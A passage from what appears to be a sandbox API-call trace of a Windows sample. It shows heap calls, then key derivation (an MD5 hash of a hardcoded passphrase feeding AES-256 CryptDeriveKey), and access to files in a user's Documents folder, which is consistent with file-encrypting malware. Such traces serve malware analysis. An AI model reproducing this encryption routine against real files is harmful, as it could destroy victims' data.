out: hHeap=0x1780000) returned 1 [0084.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0084.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0084.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0084.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0084.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0084.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0084.434] CryptAcquireContextA (in: phProv=0x144e558, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e558*=0x41a43f8) returned 1 [0084.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0084.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0084.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0084.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0084.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0084.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0084.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0084.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0084.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0084.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0084.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0084.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0084.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0084.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0084.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0084.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0084.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0084.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0084.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0084.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0084.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0084.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0084.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0084.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0084.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0084.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0084.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0084.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0084.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0084.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0084.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0084.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0084.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0084.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0084.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0084.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0084.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0084.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0084.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0084.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0084.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0084.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0084.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0084.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0084.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0084.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0084.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0084.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0084.437] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0084.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0084.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0084.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0084.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0084.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0084.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0084.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0084.437] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0084.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0084.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0084.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0084.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0084.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0084.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0084.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0084.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0084.437] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0084.437] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0084.437] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0084.438] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0084.438] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0084.438] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0084.439] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0084.440] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0084.440] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0084.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0084.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cac10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0084.440] CryptCreateHash (in: hProv=0x41a43f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e2c8 | out: phHash=0x144e2c8) returned 1 [0084.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0084.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0084.440] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0084.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0084.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0084.441] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0084.441] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0084.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0084.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cada8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0084.441] CryptHashData (hHash=0x41ac2c0, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0084.441] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0084.441] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0084.441] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0084.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0084.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cb060, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0084.442] CryptDeriveKey (in: hProv=0x41a43f8, Algid=0x6610, hBaseData=0x41ac2c0, dwFlags=0x1, phKey=0x144e2c8 | out: phKey=0x144e2c8*=0x41ac500) returned 1 [0084.442] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0084.442] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0084.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0084.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0084.442] CryptDestroyHash (hHash=0x41ac2c0) returned 1 [0084.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0084.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea2e0 [0084.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0084.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0084.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0084.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0084.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0084.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0084.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0084.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0084.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0084.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0084.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0084.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0084.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0084.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0084.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0084.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0084.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0084.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0084.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea2e0 [0084.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0084.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0084.443] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0084.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0084.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0084.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0084.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0084.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0084.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0084.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0084.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0084.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0084.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0084.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0084.444] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0084.444] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.444] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ea00 | out: lpNewFilePointer=0x0) returned 1 [0084.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0084.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0084.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0084.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0084.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0084.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0084.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0084.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0084.444] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0084.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0084.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0084.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0084.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0084.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0084.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0084.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0084.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0084.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0084.445] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0084.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0084.445] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0084.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0084.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0084.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0084.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0084.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0084.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0084.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0084.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0084.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0084.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0084.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0084.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0084.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0084.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0084.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0084.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0084.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0084.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0084.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0084.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0084.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0084.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0084.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0084.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0084.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0084.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0084.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0084.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0084.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4e10 [0084.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0084.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0084.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0084.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43597f8 [0084.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4e10 | out: hHeap=0x1780000) returned 1 [0084.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0084.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0084.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0084.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0084.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0084.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0084.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0084.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0084.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0084.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0084.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0084.447] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\_private")) returned 0x12 [0084.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: 